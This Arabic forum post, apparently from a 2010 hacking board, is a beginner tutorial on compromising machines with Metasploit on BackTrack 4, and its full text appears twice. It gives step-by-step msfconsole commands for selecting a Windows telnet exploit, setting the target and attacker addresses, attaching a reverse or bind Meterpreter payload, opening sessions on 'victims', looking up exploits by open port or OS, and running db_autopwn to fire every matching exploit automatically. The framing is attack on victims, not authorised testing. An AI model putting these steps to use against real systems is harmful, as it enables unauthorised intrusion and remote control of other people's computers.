almaik
06-18-2010, 10:05 PM
السلآم عليـكم و رحمة اللهـ و بركـآتـة
اول شـرح لـي بالمنظمـة ، اتمنى ان يفيـد الجميـع ,
اخذت لـي لفهـ سريـعهـ بالقسـم و بصرآحـهـ المواضيـع اغلبها متقـآربه مـن بعـض و مشروحهـ بأكثـر من منتـدى ،،
فأن شـآء الله راح اشرح لـو 50% عـن الميتـى سبلويت و ادواتهـ التـي يحتـآجهـآ الهـآكر
و لو تلاحضون اني كتبت في الموضوع المستخدم العربي مـآ حبيـت اقول كراكر عربي ، لكـن الهكـر هو مـن لآ يجعـل آمــآمه شـي الا و يبحـث عن كـل مـآ يخصـه و يتقنهـ
و المستخـدم العربـي مـآ يعرف بالميتـآ الا db_nmap , msfconsole , payload و ثغرات السمب المنقرضه
و هذآ بصراحهـ شـي مخزي ، للعـلم ان مشروع الميتـآسبلويت من اقوى اول 10 مشاريع للهـآكرز ، و هو منتشر بكل المنتديـآت العربيـهـ بس للاسف القليل الي يهتـم لجميـع ادواتهـ
فآنا ببدأ بشرح بعض الادوات و البـآقي عليكـم ،،
اول ادآة و هـي msfconsole معروف ان الاداه هي الميتـآسبلويت و استغلال القغرات يكون عن طريقهـآ غـالباً
قبل كـل شـي الشـرح بيكون على توزيعة backtrack4 fainl
نبدأ بشرح اول اداه و هي msfconsie
معروفهـ الاداه بشرحها كي يكمل الموضوع
نذهب الى مسار الميتاسبلويت بالامر هذا
cd /pentest/exploits/framework3
ثم اكتب الامر هذا لتشغيل اداة الـmsfconsle
./msfconsole
و تستطيع ان تدخل للأداه دون الذهاب للمسار بمجرد كتابت msfconsle بالترنمال
الاداه فيها الادوات التـآليـهـ :
exploits < الثغرات الي تسمح لنا بدخول نظام الضحيه
payload < البايلود الملف الي بيتصل بجهاز الضحيه و لن تستطيع تطبيق اي ثغره الا بأستخدام الاداه
auxiliary < فيها ادوات كثيره مثل الـفحـص و غيره لن اتطرق لها بالموضوع هذآ
encoders < تستعمل للتشفير و لن اتطرق لها بهذا الموضوع ايضاً
و هناك بعض الادوات ان شاء الله نشرحها مع الوقت
بشرح الأداتين expliot and payload
الي هي الاهم في الاختراق
نبدأ بشرح الاداة exploit
الاداه سهـلهـ جداً و ثغرآتهـآ لآ تحتاج الا للـip فقـط [غالباً] بعـض الثغرآت يختلف طريقة استغلآلهـآ
و تأكد ان كل ثغره موجوده او كل exploit يحتاج الى بايلود
لعرض الثغرات نطبق الامر هذا
كود PHP:
show exploits
و لاستغلال ثغره معينهـ نطبق الامر
كود PHP:
use exploit/النظام المصاب / نوع الثغره / اسم الثغره /
يعني لو بغيت تستغل مثلاً ثغرة التلنت تطبق الامر التالي
كود PHP:
use exploit/windows/telnet/gamsoft_telsrv_username
نشوف اول شي كتبنا اكسبلويت ثم الونيدوز الي هو النظام المصاب و التلنت نوع الثغره ثم اسمها
و التلنت له ثغرتين بالميتا
الحين نطلع المتغيرات المطلوبه
المتغيرات : هي الي تطلبها الثغره مثل اي بي الضحيه و البورت
و تعرض المتغيرات بالامر هذا
كود PHP:
show options
RHOST و هذي تعني اي بي الضحيه او الهوست
RPORT و هذي تعني بورت الضحيه و الافضل انك تخليه مثل ماهو لان البرنامج المصاب عند الضحيه يكون متصل على البورت نفسه
طيب نظيف اي بي الضحيه الى الثغره بالامر
كود PHP:
set RHOST 127.0.0.1
طيب نشوف اذا طبقنا الثغره
الحين طلعنا المتغيرات و اضفناها بالامر الي فوق ، و بصوره انا ما اضفته للحين
طيب الحين باقي نظيف البايلود الي نبي نستخدمه للضحيه و البايلودات كثير و انا افظل البايلود meterpreter
لاضافة البايلود بأتصال عكسي طبق الامر هذا [و الاتصال العكسي هو الافضل دائماً و يشترط تفتح بورت 4444]
كود PHP:
set PAYLOAD windows/meterpreter/reverse_tcp
و اذا تبي يكون الاتصال من الضحيه نفسه اكتب الامر هذا
كود PHP:
set PAYLOAD windows/meterpreter/bind_tcp
و البايلود هذا ما راح يطلب منك الاي بي تبعك ولا البورت
بس الاول بيطلب منك الاي بي تبعك و البورت 4444 و هو موجود من اول
طيب نظيف الاي بي تبعنا
الي بيكون اسمه LHOST
بالامر
كود PHP:
set LHOST 127.0.0.1
طيب الحين نسوي استعراض لمتغيرات الثغره و نشوف كيف صارت
و بعض الثغرات ما تقدر تسوي الاستغلال على النظام اوتماتيك فيطلب منك نظام الضحيه
فعليك انك تختار النظام و قبل ان تختاره تستعرض الانظمه الي مصابه بالثغره [و احياناً يكون اصدار برنامج و ليس نظام ]
طيب نكتب الامر
كود PHP:
show targets
لعرض الانظمة المصابه
وتجي الانظمة مرقمه كل نظام له رقم
كود PHP:
set TARGET 7
و اخيراً نكتب الامر
كود PHP:
exploit
ليتم استغلال الثغره ، و اذا تم استغلال الثغره بيعلمك ان فيه جلسه جديده و عشان تتاكد اكتب الامر التالي
كود PHP:
sessions
ان طلع لك
كود:
Active sessions
No active sessions.
معناه ما استغلت الثغره و السبب هو ان النظام مرقع الثغره او غيره من الاسباب
و ان تم الاتصال بيطلع لك رقم للجهاز فعشان تستغله تكتب الامر
كود PHP:
sessions -i 1
فرقم 1 هو يعني رقم الجهاز فممكن تخترق انت اكثر من جهاز و تكون الاجهزه مرقمه
طيب اوامر الـ meterpreter
كثيره عشان تتحكم بجهاز الضحيه يمكنك ان تكتب help و تطلع لك الاوامر و جنب كل امر شرح له او تبحث عنها بقوقل
الحيـن اتوقع ما عاد احتاج اشرح البايلود لانه صار مفهوم
ننتقل من جو الاختراق الى البرامج المساعده في الميتى سبلويت الي ما شفت احد يشرحهاب المنتديات و هي مهمه لكـل مبتدئ بأختراق الانظمه ، تفيده كثير بمعرفة ثغرات الانظمه و تسهل عنه جهد كبير
و الادوات هذي موجوده بالملف tools و نروح له بالامر التالي
كود PHP:
cd /pentest/exploits/framework3/tools/
و نكتب الامر التالي كي نعرض الملفات الموجوده بالملف
كود PHP:
ls
طيب راح اشرح بعض الملفات المهمه
نبدأ باول اداة و هي module_ports.rb
الاداة هذي تعلمنا بالثغرات الي يكون فيها البورت
مثلاً ثغرت السمب بورتها 445 ، نقول فحصنا الضحيه و لقينا عنده البورت 21 ولا نعرف وش له هالبورت وش ثغرته عشان نعرف نستخدم الاداه module_ports.rb طيب طريقة استخدام الاداه بالامر هذا
كود PHP:
ruby module_ports.rb | grep "21"
و بدل الرقم 21 تضع البورت المفتوح عند الضحيـه ، و ثمها تجد الثغرات الي فيها البورت
،،
،،
الاداة الثانيه و هي module_targets.rb
لمعرفة ثغرات النظام فمثلاً نظام الضحيهـ هو XP SP2 اكس بي سيرفس باك 2
عشان نعرف ثغرات النظام هذا نطبق الامر التالي
كود PHP:
ruby module_targets.rb | grep "XP SP2"
و بتطلع لنا ثغرات النظام ، او اهمها و اخطرها
المطلوب هو انكم تعرفوا كيف تستعملو الادوات و جربوا جميع الادوات
طيـب نرجع للمسفكونسل msfconsle لكن بطريقهـ غيـر
و هي استعمال اداة db_autopwn
و سبق و شرحتها بمنتدى امان العرب
و هذي الاداه تسمح لنا باختراق النظام بدون تعب و تجرب عليه جميع ثغرات المنافذ المفتوحه بجهاز الضحيه
لكن بشرحها هنا و الاداه هذي فيها مشكله واجهة الشعب كله و قالو حلها تعيد تركيبها و هذا مشوار
لكن انا بستعملها بطريقه تختلف لحل المشكله
نبدأ بالشرح
اول شـيء نروح للمسفكونسل msfconsle و مشروحه فوق كيف تروح لـه
طيب بعد ما نشغل msfconsle نكتب الامر هذا
كود PHP:
db_driver sqlite3
و الحين نطبق الامر التالي كي نفتح مجلد يكون محفوظ فيه ips الضحايا لنك تقدر تطبق الاداه هذي على اكثر من جهاز او على نطاق معين
كود PHP:
db_create arhaby
arhaby تعني اسم المجلد
طيب الحين نفحص نظام الضحيه بالامر
كود PHP:
db_nmap 127.0.0.1
حلو الحين باقي اخر خطوه كيف يتم استغلال الثغرات المفتوحه بجهاز الضحيهـ بالامر
كود PHP:
db_autopwn -x -p -e
و بتشوف ان الاداه بتطبق ثغرات كثيره و بياخذ وقت على حسب البورتات المفتوحه بجهاز الضحيه و عدد الاجهزه الي بتطبق عليها
و هذا شرح من اليوتييوب
http://www.youtube.com/watch?v=QfloV0FbwG8
عسى اني افدتكم بأول شرح لـي ، و الاهدأء الى
نجوم المنتدى :cool:
Cracker
black.jaguar
ASDELY-ScOrPiOn
اول شـرح لـي بالمنظمـة ، اتمنى ان يفيـد الجميـع ,
اخذت لـي لفهـ سريـعهـ بالقسـم و بصرآحـهـ المواضيـع اغلبها متقـآربه مـن بعـض و مشروحهـ بأكثـر من منتـدى ،،
فأن شـآء الله راح اشرح لـو 50% عـن الميتـى سبلويت و ادواتهـ التـي يحتـآجهـآ الهـآكر
و لو تلاحضون اني كتبت في الموضوع المستخدم العربي مـآ حبيـت اقول كراكر عربي ، لكـن الهكـر هو مـن لآ يجعـل آمــآمه شـي الا و يبحـث عن كـل مـآ يخصـه و يتقنهـ
و المستخـدم العربـي مـآ يعرف بالميتـآ الا db_nmap , msfconsole , payload و ثغرات السمب المنقرضه
و هذآ بصراحهـ شـي مخزي ، للعـلم ان مشروع الميتـآسبلويت من اقوى اول 10 مشاريع للهـآكرز ، و هو منتشر بكل المنتديـآت العربيـهـ بس للاسف القليل الي يهتـم لجميـع ادواتهـ
فآنا ببدأ بشرح بعض الادوات و البـآقي عليكـم ،،
اول ادآة و هـي msfconsole معروف ان الاداه هي الميتـآسبلويت و استغلال القغرات يكون عن طريقهـآ غـالباً
قبل كـل شـي الشـرح بيكون على توزيعة backtrack4 fainl
نبدأ بشرح اول اداه و هي msfconsie
معروفهـ الاداه بشرحها كي يكمل الموضوع
نذهب الى مسار الميتاسبلويت بالامر هذا
cd /pentest/exploits/framework3
ثم اكتب الامر هذا لتشغيل اداة الـmsfconsle
./msfconsole
و تستطيع ان تدخل للأداه دون الذهاب للمسار بمجرد كتابت msfconsle بالترنمال
الاداه فيها الادوات التـآليـهـ :
exploits < الثغرات الي تسمح لنا بدخول نظام الضحيه
payload < البايلود الملف الي بيتصل بجهاز الضحيه و لن تستطيع تطبيق اي ثغره الا بأستخدام الاداه
auxiliary < فيها ادوات كثيره مثل الـفحـص و غيره لن اتطرق لها بالموضوع هذآ
encoders < تستعمل للتشفير و لن اتطرق لها بهذا الموضوع ايضاً
و هناك بعض الادوات ان شاء الله نشرحها مع الوقت
بشرح الأداتين expliot and payload
الي هي الاهم في الاختراق
نبدأ بشرح الاداة exploit
الاداه سهـلهـ جداً و ثغرآتهـآ لآ تحتاج الا للـip فقـط [غالباً] بعـض الثغرآت يختلف طريقة استغلآلهـآ
و تأكد ان كل ثغره موجوده او كل exploit يحتاج الى بايلود
لعرض الثغرات نطبق الامر هذا
كود PHP:
show exploits
و لاستغلال ثغره معينهـ نطبق الامر
كود PHP:
use exploit/النظام المصاب / نوع الثغره / اسم الثغره /
يعني لو بغيت تستغل مثلاً ثغرة التلنت تطبق الامر التالي
كود PHP:
use exploit/windows/telnet/gamsoft_telsrv_username
نشوف اول شي كتبنا اكسبلويت ثم الونيدوز الي هو النظام المصاب و التلنت نوع الثغره ثم اسمها
و التلنت له ثغرتين بالميتا
الحين نطلع المتغيرات المطلوبه
المتغيرات : هي الي تطلبها الثغره مثل اي بي الضحيه و البورت
و تعرض المتغيرات بالامر هذا
كود PHP:
show options
RHOST و هذي تعني اي بي الضحيه او الهوست
RPORT و هذي تعني بورت الضحيه و الافضل انك تخليه مثل ماهو لان البرنامج المصاب عند الضحيه يكون متصل على البورت نفسه
طيب نظيف اي بي الضحيه الى الثغره بالامر
كود PHP:
set RHOST 127.0.0.1
طيب نشوف اذا طبقنا الثغره
الحين طلعنا المتغيرات و اضفناها بالامر الي فوق ، و بصوره انا ما اضفته للحين
طيب الحين باقي نظيف البايلود الي نبي نستخدمه للضحيه و البايلودات كثير و انا افظل البايلود meterpreter
لاضافة البايلود بأتصال عكسي طبق الامر هذا [و الاتصال العكسي هو الافضل دائماً و يشترط تفتح بورت 4444]
كود PHP:
set PAYLOAD windows/meterpreter/reverse_tcp
و اذا تبي يكون الاتصال من الضحيه نفسه اكتب الامر هذا
كود PHP:
set PAYLOAD windows/meterpreter/bind_tcp
و البايلود هذا ما راح يطلب منك الاي بي تبعك ولا البورت
بس الاول بيطلب منك الاي بي تبعك و البورت 4444 و هو موجود من اول
طيب نظيف الاي بي تبعنا
الي بيكون اسمه LHOST
بالامر
كود PHP:
set LHOST 127.0.0.1
طيب الحين نسوي استعراض لمتغيرات الثغره و نشوف كيف صارت
و بعض الثغرات ما تقدر تسوي الاستغلال على النظام اوتماتيك فيطلب منك نظام الضحيه
فعليك انك تختار النظام و قبل ان تختاره تستعرض الانظمه الي مصابه بالثغره [و احياناً يكون اصدار برنامج و ليس نظام ]
طيب نكتب الامر
كود PHP:
show targets
لعرض الانظمة المصابه
وتجي الانظمة مرقمه كل نظام له رقم
كود PHP:
set TARGET 7
و اخيراً نكتب الامر
كود PHP:
exploit
ليتم استغلال الثغره ، و اذا تم استغلال الثغره بيعلمك ان فيه جلسه جديده و عشان تتاكد اكتب الامر التالي
كود PHP:
sessions
ان طلع لك
كود:
Active sessions
No active sessions.
معناه ما استغلت الثغره و السبب هو ان النظام مرقع الثغره او غيره من الاسباب
و ان تم الاتصال بيطلع لك رقم للجهاز فعشان تستغله تكتب الامر
كود PHP:
sessions -i 1
فرقم 1 هو يعني رقم الجهاز فممكن تخترق انت اكثر من جهاز و تكون الاجهزه مرقمه
طيب اوامر الـ meterpreter
كثيره عشان تتحكم بجهاز الضحيه يمكنك ان تكتب help و تطلع لك الاوامر و جنب كل امر شرح له او تبحث عنها بقوقل
الحيـن اتوقع ما عاد احتاج اشرح البايلود لانه صار مفهوم
ننتقل من جو الاختراق الى البرامج المساعده في الميتى سبلويت الي ما شفت احد يشرحهاب المنتديات و هي مهمه لكـل مبتدئ بأختراق الانظمه ، تفيده كثير بمعرفة ثغرات الانظمه و تسهل عنه جهد كبير
و الادوات هذي موجوده بالملف tools و نروح له بالامر التالي
كود PHP:
cd /pentest/exploits/framework3/tools/
و نكتب الامر التالي كي نعرض الملفات الموجوده بالملف
كود PHP:
ls
طيب راح اشرح بعض الملفات المهمه
نبدأ باول اداة و هي module_ports.rb
الاداة هذي تعلمنا بالثغرات الي يكون فيها البورت
مثلاً ثغرت السمب بورتها 445 ، نقول فحصنا الضحيه و لقينا عنده البورت 21 ولا نعرف وش له هالبورت وش ثغرته عشان نعرف نستخدم الاداه module_ports.rb طيب طريقة استخدام الاداه بالامر هذا
كود PHP:
ruby module_ports.rb | grep "21"
و بدل الرقم 21 تضع البورت المفتوح عند الضحيـه ، و ثمها تجد الثغرات الي فيها البورت
،،
،،
الاداة الثانيه و هي module_targets.rb
لمعرفة ثغرات النظام فمثلاً نظام الضحيهـ هو XP SP2 اكس بي سيرفس باك 2
عشان نعرف ثغرات النظام هذا نطبق الامر التالي
كود PHP:
ruby module_targets.rb | grep "XP SP2"
و بتطلع لنا ثغرات النظام ، او اهمها و اخطرها
المطلوب هو انكم تعرفوا كيف تستعملو الادوات و جربوا جميع الادوات
طيـب نرجع للمسفكونسل msfconsle لكن بطريقهـ غيـر
و هي استعمال اداة db_autopwn
و سبق و شرحتها بمنتدى امان العرب
و هذي الاداه تسمح لنا باختراق النظام بدون تعب و تجرب عليه جميع ثغرات المنافذ المفتوحه بجهاز الضحيه
لكن بشرحها هنا و الاداه هذي فيها مشكله واجهة الشعب كله و قالو حلها تعيد تركيبها و هذا مشوار
لكن انا بستعملها بطريقه تختلف لحل المشكله
نبدأ بالشرح
اول شـيء نروح للمسفكونسل msfconsle و مشروحه فوق كيف تروح لـه
طيب بعد ما نشغل msfconsle نكتب الامر هذا
كود PHP:
db_driver sqlite3
و الحين نطبق الامر التالي كي نفتح مجلد يكون محفوظ فيه ips الضحايا لنك تقدر تطبق الاداه هذي على اكثر من جهاز او على نطاق معين
كود PHP:
db_create arhaby
arhaby تعني اسم المجلد
طيب الحين نفحص نظام الضحيه بالامر
كود PHP:
db_nmap 127.0.0.1
حلو الحين باقي اخر خطوه كيف يتم استغلال الثغرات المفتوحه بجهاز الضحيهـ بالامر
كود PHP:
db_autopwn -x -p -e
و بتشوف ان الاداه بتطبق ثغرات كثيره و بياخذ وقت على حسب البورتات المفتوحه بجهاز الضحيه و عدد الاجهزه الي بتطبق عليها
و هذا شرح من اليوتييوب
http://www.youtube.com/watch?v=QfloV0FbwG8
عسى اني افدتكم بأول شرح لـي ، و الاهدأء الى
نجوم المنتدى :cool:
Cracker
black.jaguar
ASDELY-ScOrPiOn